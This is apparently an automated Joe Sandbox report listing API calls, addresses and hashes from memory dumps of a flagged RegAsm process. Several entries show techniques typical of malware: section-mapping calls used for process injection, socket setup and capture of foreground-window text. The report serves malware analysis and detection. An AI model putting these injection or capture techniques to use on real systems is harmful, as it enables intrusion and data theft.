                                                                                • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                APIs
                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2568140703-3893581201
                                                                                • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                APIs
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                Strings
                                                                                • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 2593887523-3084827643
                                                                                • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Alloc
                                                                                • String ID: FlsAlloc
                                                                                • API String ID: 2773662609-671089009
                                                                                • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc
                                                                                • String ID: FlsAlloc
                                                                                • API String ID: 2773662609-671089009
                                                                                • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                APIs
                                                                                • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: FlsAlloc
                                                                                • API String ID: 2742660187-671089009
                                                                                • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                APIs
                                                                                • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: FlsAlloc
                                                                                • API String ID: 2742660187-671089009
                                                                                • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID: @
                                                                                • API String ID: 1890195054-2766056989
                                                                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                APIs
                                                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CodeInfoPageValid
                                                                                • String ID:
                                                                                • API String ID: 546120528-0
                                                                                • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                APIs
                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CodeInfoPageValid
                                                                                • String ID:
                                                                                • API String ID: 546120528-0
                                                                                • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                  • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                • _free.LIBCMT ref: 0044F050
                                                                                • _free.LIBCMT ref: 0044F086
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast_abort
                                                                                • String ID:
                                                                                • API String ID: 2991157371-0
                                                                                • Opcode ID: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                                                • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                • Opcode Fuzzy Hash: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                                                • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                APIs
                                                                                  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                • _free.LIBCMT ref: 10006CD7
                                                                                • _free.LIBCMT ref: 10006D0D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast_abort
                                                                                • String ID:
                                                                                • API String ID: 2991157371-0
                                                                                • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                                                • String ID:
                                                                                • API String ID: 2279764990-0
                                                                                • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00446227
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocAllocate_free
                                                                                • String ID:
                                                                                • API String ID: 2447670028-0
                                                                                • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventStartupsocket
                                                                                • String ID:
                                                                                • API String ID: 1953588214-0
                                                                                • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                APIs
                                                                                • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                • String ID:
                                                                                • API String ID: 3750050125-0
                                                                                • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$ForegroundText
                                                                                • String ID:
                                                                                • API String ID: 29597999-0
                                                                                • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                APIs
                                                                                  • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                • String ID:
                                                                                • API String ID: 806969131-0
                                                                                • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                APIs
                                                                                  • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                • String ID:
                                                                                • API String ID: 806969131-0
                                                                                • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                APIs
                                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                  • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                  • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                • String ID:
                                                                                • API String ID: 2948481953-0
                                                                                • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                                • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                                APIs
                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
